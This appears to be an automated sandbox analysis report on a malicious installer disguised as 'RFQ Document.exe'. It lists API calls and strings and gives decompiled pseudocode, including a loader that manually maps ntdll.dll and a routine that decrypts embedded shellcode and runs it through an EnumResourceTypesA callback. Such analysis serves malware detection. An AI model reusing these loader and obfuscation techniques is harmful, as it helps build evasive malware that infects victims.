0x00403178
0x00403179
0x00403185
0x0040318b
0x00000000
0x0040318d
0x0040318f
0x00403196
0x0040319b
0x004031a0
0x004031a7
0x004031ad
0x004031c3
0x004031d3
0x004031d8
0x004031de
0x004031e5
0x004031f8
0x004031fd
0x004031ff
0x00403201
0x00403206
0x00403206
0x00403216
0x0040321c
0x00000000
0x0040321c

APIs

SetErrorMode.KERNELBASE ref: 00403150
GetVersion.KERNEL32 ref: 00403156
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
#17.COMCTL32(0000000B,0000000D), ref: 004031A0
OleInitialize.OLE32(00000000), ref: 004031A7
SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
GetCommandLineA.KERNEL32(iqbk Setup,NSIS Error), ref: 004031D8
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000), ref: 004031EB
CharNextA.USER32(00000000,"C:\Users\user\Desktop\RFQ Document.exe" ,00409168), ref: 00403216
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
DeleteFileA.KERNELBASE(1033), ref: 004032E5

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

OleUninitialize.OLE32(00000020), ref: 00403366
ExitProcess.KERNEL32 ref: 00403386
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000,00000020), ref: 00403399
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000,00000020), ref: 004033A8
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000,00000020), ref: 004033B3
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000,00000020), ref: 004033BF
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
CopyFileA.KERNEL32 ref: 00403439
CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
ExitProcess.KERNEL32 ref: 0040353A

Strings

C:\Users\user\Desktop, xrefs: 004033B8, 004033BD, 004033E9
NSIS Error, xrefs: 004031C9
Error launching installer, xrefs: 0040331E
", xrefs: 00403238
C:\Users\user\AppData\Local\Temp, xrefs: 00403343
iqbk Setup, xrefs: 004031CE
C:\Users\user\AppData\Local\Temp, xrefs: 00403298, 00403338, 004033E1, 004033EA
NCRC, xrefs: 00403258
.tmp, xrefs: 004033AD
_?=, xrefs: 0040330F
/D=, xrefs: 00403270
1033, xrefs: 004032E0
, xrefs: 0040314B
~nsu, xrefs: 00403391
UXTHEME, xrefs: 00403173, 00403178, 0040317E
SeShutdownPrivilege, xrefs: 004034D1
\Temp, xrefs: 004032C8
C:\Users\user\AppData\Local\Temp\, xrefs: 004032A2, 004032A7, 004032C1, 004032CD, 00403396, 004033A7, 004033B2, 004033BE, 004033CB, 004033DA, 0040347A
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 004031DE, 004031E4, 00403305
C:\Users\user\Desktop\RFQ Document.exe, xrefs: 00403434

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\RFQ Document.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ Document.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$iqbk Setup$~nsu
API String ID: 3469842172-199352807
Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004054f7
0x004054fb
0x00405504
0x00405507
0x0040550a
0x00405512
0x00405514
0x00405515
0x00000000
0x00405515
0x00405524
0x00405524
0x00405527
0x0040552a
0x0040553e
0x00405545
0x0040554a
0x0040554c
0x0040555c
0x0040554e
0x00405554
0x00405554
0x00405561
0x00405564
0x0040556f
0x00405575
0x0040557a
0x0040558a
0x0040558c
0x00405592
0x00405595
0x00405598
0x00405655
0x00405655
0x00405659
0x0040565b
0x0040565b
0x0040565b
0x0040565b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040559e
0x0040559e
0x004055a7
0x004055ad
0x004055b2
0x004055b5
0x004055b7
0x004055bb
0x004055bd
0x004055bd
0x004055bb
0x004055c0
0x004055c3
0x004055d6
0x004055d8
0x004055dd
0x004055e4
0x004055fc
0x00405602
0x00405608
0x0040560a
0x0040562f
0x0040560c
0x0040560c
0x00405610
0x00405624
0x00405612
0x00405615
0x0040561d
0x0040561d
0x00405610
0x004055e6
0x004055ec
0x004055ee
0x004055f4
0x004055f4
0x004055ee
0x00000000
0x004055e4
0x004055c5
0x004055c8
0x004055ca
0x00000000
0x00000000
0x004055cc
0x004055ce
0x00000000
0x00000000
0x004055d0
0x004055d4
0x00000000
0x00000000
0x00000000
0x00405634
0x0040563e
0x00405644
0x00405644
0x0040564f
0x00000000
0x0040564f
0x00405566
0x0040556d
0x00000000
0x00000000
0x00000000
0x0040552c
0x0040552c
0x0040552e
0x0040565f
0x00405662
0x00405665
0x004056b7
0x004056b7
0x004056b7
0x00405667
0x0040566a
0x00405675
0x0040567a
0x0040567c
0x00000000
0x00000000
0x0040567f
0x00405685
0x0040568b
0x00405691
0x00405693
0x00000000
0x004056af
0x00405695
0x00405699
0x00000000
0x00000000
0x0040569e
0x00000000
0x004056a5
0x0040566c
0x0040566c
0x00000000
0x0040566c
0x00405534
0x00405538
0x00000000
0x00000000
0x00000000
0x00405538

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
FindClose.KERNEL32(?), ref: 0040564F

Strings

\*.*, xrefs: 0040554E
C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 004054EC

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3995956661
Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B472, Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E6FD8B472(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E6FD8B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E6FD8B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E6FD8B7E6(_t137, 0x7fb47add);
				_v32 = E6FD8B7E6(_t137, 0x7fe7f840);
				_v24 = E6FD8B7E6(_t137, 0x7fe1f1fb);
				_v28 = E6FD8B7E6(_t137, 0x7f951704);
				_v36 = E6FD8B7E6(_t137, 0x7f91a078);
				_t78 = CreateFileW(E6FD8B7B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E6FD8B74B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E6FD8B7E6(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E6FD8B74B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}

0x6fd8b472
0x6fd8b47d
0x6fd8b480
0x6fd8b484
0x6fd8b486
0x6fd8b489
0x6fd8b48c
0x6fd8b48d
0x6fd8b493
0x6fd8b494
0x6fd8b49a
0x6fd8b49e
0x6fd8b4a2
0x6fd8b4a6
0x6fd8b4aa
0x6fd8b4ae
0x6fd8b4b2
0x6fd8b4c9
0x6fd8b4d2
0x6fd8b4ea
0x6fd8b4f9
0x6fd8b508
0x6fd8b517
0x6fd8b526
0x6fd8b543
0x6fd8b54c
0x6fd8b54e
0x6fd8b550
0x6fd8b556
0x6fd8b636
0x6fd8b636
0x6fd8b638
0x6fd8b638
0x6fd8b63b
0x6fd8b63d
0x6fd8b640
0x6fd8b640
0x6fd8b645
0x00000000
0x6fd8b664
0x6fd8b64a
0x6fd8b64c
0x6fd8b64e
0x6fd8b65a
0x6fd8b65c
0x6fd8b663
0x6fd8b663
0x6fd8b65e
0x6fd8b65e
0x6fd8b65e
0x6fd8b650
0x6fd8b656
0x6fd8b656
0x6fd8b64e
0x6fd8b669
0x6fd8b66e
0x6fd8b678
0x6fd8b678
0x6fd8b683
0x6fd8b683
0x6fd8b55e
0x6fd8b561
0x6fd8b567
0x00000000
0x00000000
0x6fd8b579
0x6fd8b57d
0x00000000
0x6fd8b598
0x6fd8b59d
0x6fd8b5ac
0x6fd8b5af
0x6fd8b5b2
0x6fd8b5b7
0x6fd8b632
0x00000000
0x6fd8b632
0x6fd8b5c0
0x6fd8b5c5
0x6fd8b5ce
0x6fd8b607
0x6fd8b607
0x6fd8b614
0x6fd8b618
0x00000000
0x00000000
0x6fd8b61a
0x6fd8b61f
0x6fd8b622
0x6fd8b622
0x6fd8b62d
0x00000000
0x6fd8b5d0
0x6fd8b5d3
0x6fd8b5d9
0x6fd8b5db
0x6fd8b5de
0x6fd8b5ea
0x6fd8b5f5
0x6fd8b5fa
0x6fd8b5fd
0x6fd8b600
0x6fd8b603
0x00000000
0x6fd8b5de
0x6fd8b5ce

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FD8B54C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16,6FD8B3B9), ref: 6FD8B576
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16), ref: 6FD8B58D
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16,6FD8B3B9), ref: 6FD8B5AF
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16,6FD8B3B9,00000000,00000000), ref: 6FD8B622
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16,6FD8B3B9), ref: 6FD8B62D
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6FD8B1FA,7FC6FA16,6FD8B3B9,00000000), ref: 6FD8B678

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
Instruction ID: d18b8f2c94d86e9ed1531bae6b7e1546b279dfba6714e2d429f5ac134ec6fb73
Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
Instruction Fuzzy Hash: B4618E75E04705ABDB50CFB4C881BAEB7B5AF49B10F108159E525EB3D0EB74AD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6FD87500, Relevance: 3.2, APIs: 2, Instructions: 168
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6FD87500(void* __ecx) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _t109;
				int _t112;
				void* _t143;

				_t143 = __ecx;
				_v16 = 0;
				_t109 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
				_v16 = _t109;
				if(_v16 != 0) {
					E6FD877A0(_t143, _v16, 0xbebc200);
					_v12 = 0;
					_v12 = 0;
					while(_v12 < 0x1399) {
						_t11 = E6FD8B070 + _v12; // 0x25000000
						_v5 =  *_t11;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = _v5 & 0x000000ff ^ 0x000000b9;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x0000002f;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x9a;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000061;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x4c;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) - 0x74;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xed;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = _v5 & 0x000000ff ^ 0x00000089;
						_v5 = (_v5 & 0x000000ff) + 0xf8;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xfc;
						_v5 = _v5 & 0x000000ff ^ 0x000000f9;
						_v5 = (_v5 & 0x000000ff) - 0x85;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x19;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x0000007b;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x0000009d;
						_v5 = (_v5 & 0x000000ff) - 0xa8;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000ee;
						 *((char*)(E6FD8B070 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					_t112 = EnumResourceTypesA(0, E6FD8B070, 0); // executed
					return _t112;
				}
				return _t109;
			}

0x6fd87500
0x6fd87506
0x6fd8751b
0x6fd87521
0x6fd87528
0x6fd87537
0x6fd8753f
0x6fd87546
0x6fd87558
0x6fd87568
0x6fd8756e
0x6fd87580
0x6fd8758c
0x6fd87595
0x6fd8759f
0x6fd875a8
0x6fd875b5
0x6fd875bf
0x6fd875c8
0x6fd875d2
0x6fd875db
0x6fd875e5
0x6fd875ef
0x6fd875f8
0x6fd87602
0x6fd87615
0x6fd8761f
0x6fd87629
0x6fd87632
0x6fd8763e
0x6fd87651
0x6fd8765d
0x6fd8766a
0x6fd87673
0x6fd8767f
0x6fd8768c
0x6fd87699
0x6fd876a2
0x6fd876ac
0x6fd876b6
0x6fd876c0
0x6fd876ca
0x6fd876d4
0x6fd876dd
0x6fd876e7
0x6fd876f0
0x6fd876fc
0x6fd87709
0x6fd8771b
0x6fd87725
0x6fd87732
0x6fd8773b
0x6fd87555
0x6fd87555
0x6fd8774f
0x00000000
0x6fd8774f
0x6fd87758

APIs

VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 6FD8751B
EnumResourceTypesA.KERNEL32(00000000,6FD8B070,00000000), ref: 6FD8774F

Memory Dump Source

Source File: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEnumResourceTypesVirtual
String ID:
API String ID: 1791965044-0
Opcode ID: f549feb292e4fdc23c61372d20c4767a50f37b63d3675595d865b493ba1afbf3
Instruction ID: d2625cda71d07419f4a9cfebcdb27f00822f11427a248513fd06a4ea1dc10187
Opcode Fuzzy Hash: f549feb292e4fdc23c61372d20c4767a50f37b63d3675595d865b493ba1afbf3
Instruction Fuzzy Hash: AC71845484D2E8B9DB06C7FA84617ECFFB15F67102F0881CAE0E166286D57A534EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}

0x00405ecd
0x00405ed6
0x00000000
0x00405ee3
0x00405ed9
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
FindClose.KERNEL32(00000000), ref: 00405ED9

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
